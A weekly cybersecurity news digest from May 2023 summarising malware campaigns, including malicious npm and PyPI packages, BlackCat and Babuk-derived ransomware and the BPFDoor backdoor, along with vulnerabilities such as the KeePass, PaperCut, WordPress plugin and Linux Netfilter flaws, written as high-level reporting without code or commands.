05/18/2023-05/24/2023 PyPI Repository Under Attack, NPM Packages for Node.js Hiding Dangerous TurkoRat Malware, Malicious Windows Kernel Drivers And More

1. PyPI Repository Under Attack: User Sign-Ups and Package Uploads Temporarily Halted

The maintainers of Python Package Index (PyPI) have temporarily disabled the ability for users to sign up and upload new packages until further notice. No additional details about the nature of the malware and the threat actors involved in publishing those rogue packages to PyPI were disclosed. The decision to freeze new user and project registrations comes as software registries such as PyPI have proven time and time again to be a popular target for attackers looking to poison the software supply chain and compromise developer environments. Earlier this week, Israeli cybersecurity startup Phylum uncovered an active malware campaign that leverages OpenAI ChatGPT-themed lures to bait developers into downloading a malicious Python module capable of stealing clipboard content in order to hijack cryptocurrency transactions. ReversingLabs, in a similar discovery, identified multiple npm packages named nodejs-encrypt-agent and nodejs-cookie-proxy-agent in the npm repository that drops a trojan called TurkoRat.

2. npm Packages Caught Serving TurkoRAT Binaries That Mimic NodeJS

Researchers have discovered multiple npm packages named after NodeJS libraries that even pack a Windows executable that resembles NodeJS but instead drops a sinister trojan.
These packages, given their stealthiness and a very low detection rate, had been present on npm for over two months prior to their detection by the researchers.
Software security firm ReversingLabs analyzed three npm packages that were present on the npmjs.com registry for over two months. 

Initially appearing legitimate, the package named nodejs-encrypt-agent raised concerns due to discrepancies. Further investigation by ReversingLabs revealed that the package contained a malicious portable executable (PE) file named ‘lib.exe.’ Despite its large size of approximately 100 MB, the file closely resembled a real NodeJS application, making it difficult to detect. The PE file was found to run a customizable infostealer called TurkoRAT, designed to steal sensitive information such as login credentials and crypto wallets, while evading sandbox environments and debuggers. Another package, nodejs-cookie-proxy-agent, disguised the malicious executable as a dependency named axios-proxy. ReversingLabs detected and reported these malicious packages, emphasizing the ongoing risk of unvetted open source packages to software supply chain security.

3. Privacy Sandbox Initiative: Google to Phase Out Third-Party Cookies Starting 2024

Google has announced plans to officially flip the switch on its twice-delayed Privacy Sandbox initiatives as it slowly works its way to deprecate support for third-party cookies in Chrome browser. To that end, the search and advertising giant said it intends to phase out third-party cookies for 1% of Chrome users globally in the first quarter of 2024. This will support developers in conducting real world experiments that assess the readiness and effectiveness of their products without third-party cookies. Prior to rolling this out, Google said it would introduce the ability for third-party developers to simulate the process for a configurable subset of their users (up to 10%) in Q4 2023. Privacy Sandbox is a two-pronged project for the web and Android that aims to limit covert tracking by eliminating the need for third-party cookies and cross-app identifiers and still serving relevant content and ads in a privacy-preserving manner.

4. Malicious Windows Kernel Drivers Used In BlackCat Ransomware Attacks

BlackCat employed signed malicious Windows kernel drivers to evade security software detection during attacks. The driver, an improved version of the ‘POORTRY’ malware, was spotted by Trend Micro and previously identified by Microsoft, Mandiant, Sophos, and SentinelOne in ransomware attacks. POORTRY, a Windows kernel driver, was signed using stolen keys from legitimate accounts in Microsoft’s Windows Hardware Developer Program. While security software is typically protected from termination or tampering, Windows kernel drivers have the highest privileges and can terminate nearly any process. The ransomware actors initially used the Microsoft-signed POORTRY driver, but its high detection rates and revoked code-signing keys prompted them to deploy an updated version. The updated POORTRY kernel driver, signed using a stolen or leaked cross-signing certificate, helps the BlackCat ransomware operation elevate privileges on compromised machines and terminate security-related processes.

5. KeePass Exploit Allows Attackers to Recover Master Passwords from Memory

A proof-of-concept (PoC) has been made available for a security flaw impacting the KeePass password manager that could be exploited to recover a victim’s master password in cleartext under specific circumstances. The issue, tracked as CVE-2023-32784, impacts KeePass versions 2.x for Windows, Linux, and macOS, and is expected to be patched in version 2.54, which is likely to be released early next month. The vulnerability has to do with how a custom text box field used for entering the master password handles user input. Specifically, it has been found to leave traces of every character the user types in the program memory. This leads to a scenario whereby an attacker could dump the program’s memory and reassemble the password in plaintext with the exception of the first character. Users are advised to update to KeePass 2.54 once it becomes available.

6. Threat Group UNC3944 Abusing Azure Serial Console for Total VM Takeover

UNC3944, a financially motivated cyber actor also known as Roasted 0ktapus, has been exploiting Microsoft Azure Serial Console on virtual machines (VMs) to install third-party remote management tools. This unique attack method evades traditional detection methods in Azure, granting the attacker full administrative access to compromised VMs. UNC3944, which emerged last year, utilizes SIM swapping attacks to breach telecommunications and business process outsourcing companies. Mandiant, owned by Google, discovered UNC3944 using a loader named STONESTOP to install a malicious signed driver called POORTRY. This driver terminates security processes and deletes files as part of a BYOVD attack. The initial access likely involves SMS phishing messages targeting privileged users to obtain their credentials and perform a SIM swap. With elevated access, UNC3944 leverages Azure VM extensions and the serial console to gain administrative control. PowerShell is used to deploy legitimate remote administration tools, demonstrating the use of living-off-the-land techniques to evade detection and advance the attack.

05/11/2023-05/17/2023 11 New Vulnerabilities Expose OT Networks, New Flaw in WordPress Plugin, New Stealthy Variant of Linux Backdoor And More

1. Industrial Cellular Routers at Risk: 11 New Vulnerabilities Expose OT Networks

Several security vulnerabilities in cloud management platforms linked to three industrial cellular router vendors were revealed by Israeli cybersecurity firm OTORIO at the Black Hat Asia 2023 conference. These vulnerabilities could expose operational technology (OT) networks to external attacks, impacting critical infrastructure sectors like substations, water utilities, oil fields, and pipelines. The weaknesses affect the cloud-based management solutions offered by Sierra Wireless, Teltonika Networks, and InHand Networks. Exploiting the vulnerabilities could enable remote code execution, full control over devices and OT networks, exfiltration of sensitive information, and unauthorized access with elevated permissions. The flaws involve weak asset registration mechanisms, security configuration flaws, and issues in external APIs and interfaces. Collaboration with Claroty also led to the discovery of additional vulnerabilities in Teltonika Networks’ RMS and RUT router firmware, allowing arbitrary code execution and command injection.

2. New ‘MichaelKors’ Ransomware-as-a-Service Targeting Linux and VMware ESXi Systems

MichaelKors, a new ransomware-as-a-service (RaaS) operation, has recently emerged, targeting Linux and VMware ESXi systems as of April 2023. Cybersecurity firm CrowdStrike has observed an increasing trend of cybercriminals focusing on ESXi, despite its lack of support for third-party agents or antivirus software. This makes the widely used ESXi hypervisor an appealing target for attackers, a technique known as hypervisor jackpotting. Furthermore, leaked Babuk source code from September 2021 has been utilized by 10 different ransomware families, including Conti and REvil, to develop lockers for VMware ESXi hypervisors. Various e-crime groups such as ALPHV (BlackCat), Black Basta, Defray, and others have also updated their tactics to target ESXi. Attackers exploit compromised credentials, gain elevated privileges, and leverage known vulnerabilities to breach ESXi hypervisors and gain unrestricted access to underlying resources. To mitigate the impact of hypervisor jackpotting, organizations are recommended to avoid direct access to ESXi hosts, enable two-factor authentication, take periodic backups of ESXi datastore volumes, apply security updates, and conduct security posture reviews.

3. XWorm Malware Exploits Follina Vulnerability in New Wave of Attacks

Researchers have uncovered an ongoing phishing campaign, named MEME#4CHAN, that utilizes a unique attack chain to distribute the XWorm malware. The attacks have primarily targeted manufacturing firms and healthcare clinics in Germany. The campaign employs meme-filled PowerShell code and heavily obfuscated XWorm payloads to infect victims. The attackers use reservation-themed lures in phishing emails, tricking recipients into opening malicious documents. Rather than relying on macros, the threat actors exploit the Follina vulnerability to drop an obfuscated PowerShell script. This script bypasses Antimalware Scan Interface (AMSI), disables Microsoft Defender, establishes persistence, and executes the .NET binary containing XWorm. The PowerShell script includes a variable named “$CHOTAbheem,” possibly indicating a Middle Eastern or Indian background of the attackers, although attribution remains unconfirmed. XWorm is a readily available malware with various features for stealing sensitive information from infected systems.

4. New Stealthy Variant of Linux Backdoor BPFDoor Emerges from the Shadows

A new variant of a Linux backdoor called BPFDoor has been discovered by cybersecurity firm Deep Instinct. BPFDoor, previously documented by PwC and Elastic Security Labs in May 2022, is associated with a Chinese threat actor known as Red Menshen. The malware is designed to establish persistent remote access to compromised environments, particularly targeting telecom providers in the Middle East and Asia. BPFDoor utilizes Berkeley Packet Filters (BPF) technology for network communications and command execution, enabling threat actors to evade firewalls and filter unnecessary data. The latest variant of BPFDoor demonstrates increased evasiveness by removing hard-coded indicators, incorporating encryption with libtomcrypt, and utilizing a reverse shell for command-and-control communication. It avoids termination by ignoring operating system signals and establishes an encrypted reverse shell session with the C2 server. BPFDoor’s ability to remain undetected for an extended period reflects its sophistication, as cybercriminals increasingly target Linux systems prevalent in enterprise and cloud environments.

5. New Flaw in WordPress Plugin Used by Over a Million Sites Under Active Exploitation

A security vulnerability has been discovered in the Essential Addons for Elementor WordPress plugin, potentially allowing attackers to gain elevated privileges. The flaw, tracked as CVE-2023-32243, was addressed in version 5.7.2 of the plugin. Successful exploitation of the vulnerability could enable an unauthenticated user to reset the password of any user on the affected site. This could result in the compromise of administrator accounts and complete control over the website. The issue has existed since version 5.4.0 of the plugin. The disclosure follows a previous severe flaw found in the same plugin, and it coincides with a wave of attacks targeting WordPress sites with SocGholish malware. The attackers are using compression techniques to conceal the malware and evade detection. Additionally, a malvertising campaign has been identified that tricks visitors to adult websites with fake Windows update ads, leading to the installation of the “Invalid Printer” loader, which can deploy the Aurora information stealer malware.

6. Babuk Source Code Sparks 9 Different Ransomware Strains Targeting VMware ESXi Systems

The leak of the Babuk ransomware code in September 2021 has led to the development of multiple ransomware families targeting VMware ESXi systems. As many as nine different ransomware variants have emerged since late 2022 and early 2023, all based on the leaked Babuk source code. The availability of the source code has allowed cybercriminals with limited expertise to target Linux systems effectively. Among the ransomware strains based on the Babuk code are Cylance, Rorschach (also known as BabLock), and RTM Locker. The analysis by SentinelOne also reveals overlaps between Babuk and other ransomware families like Conti and REvil (also known as REvix), indicating the adoption of Babuk features in their code. Additional ransomware families, such as LOCK4, DATAF, Mario, Play, and Babuk 2023 (also known as XVGV), have also incorporated various elements from the Babuk code. However, there are no significant similarities found between Babuk and ALPHV, Black Basta, Hive, LockBit, ESXiArgs, suggesting a misattribution. SentinelOne also notes that actors may turn to Babuk’s Go-based NAS locker, as Go programming language continues to gain popularity among threat actors. In a separate development, threat actors associated with the Royal ransomware, believed to be former members of Conti, have introduced an ELF variant capable of targeting Linux and ESXi environments, expanding their attack capabilities.

7. Hackers Use Azure Serial Console For Stealthy Access To VMs

A financially motivated cybergang tracked by Mandiant as ‘UNC3944’ is using phishing and SIM swapping attacks to hijack Microsoft Azure admin accounts and gain access to virtual machines.
From there, the attackers abuse the Azure Serial Console to install remote management software for persistence and abuse Azure Extensions for stealthy surveillance.
Mandiant reports that UNC3944 has been active since at least May 2022, and their campaign aims at stealing data from victim organizations using Microsoft’s cloud computing service.
UNC3944 was previously attributed to creating the STONESTOP (loader) and POORTRY (kernel-mode driver) toolkit to terminate security software.
The threat actors utilized stolen Microsoft hardware developer accounts to sign their kernel drivers.

05/04/2023-05/10/2023 Critical PaperCut Vulnerability, MSI Data Breach, New Linux Kernel NetFilter Flaw And More

1. Microsoft Warns of State-Sponsored Attacks Exploiting Critical PaperCut Vulnerability

Iranian nation-state groups have been exploiting a critical vulnerability in PaperCut print management software, according to Microsoft’s threat intelligence team. Both Mango Sandstorm (Mercury) and Mint Sandstorm (Phosphorus) have been observed exploiting CVE-2023-27350 to gain initial access. While the former is said to be using tools from previous intrusions to connect to their C2 infrastructure, the latter has been able to quickly incorporate proof-of-concept exploits into their operations. Both groups are known state-sponsored actors, with Mango Sandstorm linked to Iran’s Ministry of Intelligence and Security and Mint Sandstorm associated with the Islamic Revolutionary Guard Corps. This comes after cybercrime gang Lace Tempest was found to have abused the same vulnerability to distribute ransomware. PaperCut released a patch for the flaw on March 8, 2023, and Trend Micro’s Zero Day Initiative is expected to release more technical information about it on May 10, 2023.

2. MSI Data Breach: Private Code Signing Keys Leaked on the Dark Web

private code signing keys on a dark website. The leaked data includes firmware image signing keys for 57 PCs and private signing keys for Intel Boot Guard used in 116 MSI products. The impact of the leaked keys extends beyond MSI to device vendors such as Intel, Lenovo, and Supermicro. Intel Boot Guard is a hardware-based security technology that safeguards against tampered UEFI firmware execution. The leak undermines firmware integrity checks, enabling threat actors to sign and deploy malicious updates and payloads undetected. This incident follows a double extortion ransomware attack on MSI by the Money Message gang, but MSI reported a gradual return to normal operations with no major financial impact. Users were advised to obtain firmware/BIOS updates exclusively from the official website and beware of fraudulent emails claiming collaboration with MSI. Notably, this is not the first time UEFI firmware code has been exposed, as a similar incident occurred with Alder Lake BIOS source code in October 2022.

3. New Vulnerability in Popular WordPress Plugin Exposes Over 2 Million Sites to Cyberattacks

Users of Advanced Custom Fields plugin for WordPress are being urged to update version 6.1.6 following the discovery of a security flaw. The issue, assigned the identifier CVE-2023-30777, relates to a case of reflected cross-site scripting (XSS) that could be abused to inject arbitrary executable scripts into otherwise benign websites. The plugin, which is available both as a free and pro version, has over two million active installations. This vulnerability allows any unauthenticated user from stealing sensitive information to, in this case, privilege escalation on the WordPress site by tricking a privileged user to visit the crafted URL path. Reflected XSS attacks usually occur when victims are tricked into clicking on a bogus link sent via email or another route, causing the malicious code to be sent to the vulnerable website, which reflects the attack back to the user’s browser. This element of social engineering means that reflected XSS does not have the same reach and scale as stored XSS attacks, prompting threat actors to distribute the malicious link to as many victims as possible. It’s worth noting that CVE-2023-30777 can be activated on a default installation or configuration of Advanced Custom Fields, although it’s also possible to do so from logged-in users who have access to the plugin.

4. Packagist Repository Hacked: Over a Dozen PHP Packages with 500 Million Installs Compromised

PHP software package repository Packagist revealed that an “attacker” gained access to four inactive accounts on the platform to hijack over a dozen packages with over 500 million installs to date. The attacker forked each of the packages and replaced the package description in composer.json with their own message but did not otherwise make any malicious changes. The package URLs were then changed to point to the forked repositories. The four user accounts are said to have had access to a total of 14 packages, including multiple Doctrine packages.The attack chain, in a nutshell, made it possible to modify the Packagist page for each of these packages to a namesake GitHub repository, effectively altering the installation workflow used within Composer environments. Successful exploitation meant that developers downloading the packages would get the forked version as opposed to the actual contents.No additional malicious changes were distributed, and that all the accounts were disabled and their packages restored on May 2, 2023. It’s also urging users to enable two-factor authentication (2FA) to secure their accounts.

5. Researchers Discover 3 Vulnerabilities in Microsoft Azure API Management Service

Microsoft Azure API Management service has been found to have three security vulnerabilities, as disclosed by Israeli cloud security firm Ermetic. The vulnerabilities include two server-side request forgery (SSRF) flaws and one unrestricted file upload functionality in the API Management developer portal. Exploiting the SSRF vulnerabilities would allow attackers to send requests from the service’s CORS Proxy and hosting proxy, gaining access to internal Azure assets, bypassing web application firewalls, and potentially causing denial of service. The file upload vulnerability enables attackers to upload malicious files to Azure’s internal workload. Azure API Management is a platform that allows organizations to securely expose their APIs. Microsoft has patched all three vulnerabilities following responsible disclosure. 

6.  GitHub Now Auto-Blocks Token and API key Leaks For All Repos

GitHub is now automatically blocking the leak of sensitive information like API keys and access tokens for all public code repositories. This feature proactively prevents leaks by scanning for secrets before ‘git push’ operations are accepted, and it works with 69 token types (API keys, private keys, secret keys, authentication tokens, access tokens, management certificates, credentials, and more) detectable with a low “false positive” detection rate. Since its beta release, software developers who enabled it successfully averted around 17,000 accidental exposures of sensitive information, saving more than 95,000 hours that would’ve been spent revoking, rotating, and remediating compromised secrets, according to GitHub. Today, push protection is generally available for private repositories with a GitHub Advanced Security (GHAS) license. 

7. New Linux Kernel NetFilter Flaw Gives Attackers Root Privileges

A new Linux NetFilter kernel flaw has been discovered, allowing unprivileged local users to escalate their privileges to root level, allowing complete control over a system. The CVE-2023-32233 identifier has been reserved for the vulnerability, but a severity level is yet to be determined. The security problem stems from Netfilter nf_tables accepting invalid updates to its configuration, allowing specific scenarios where invalid batch requests lead to the corruption of the subsystem’s internal state. Netfilter is a packet filtering and network address translation (NAT) framework built into the Linux kernel that is managed through front-end utilities, such as IPtables and UFW. Corrupting the system’s internal state leads to a use-after-free vulnerability that can be exploited to perform arbitrary reads and writes in the kernel memory. A Linux kernel source code commit was submitted to address the problem by engineer Pablo Neira Ayuso, introducing two functions that manage the lifecycle of anonymous sets in the Netfilter nf_tables subsystem. By properly managing the activation and deactivation of anonymous sets and preventing further updates, this fix prevents memory corruption and the possibility of attackers exploiting the use-after-free issue to escalate their privileges to root level.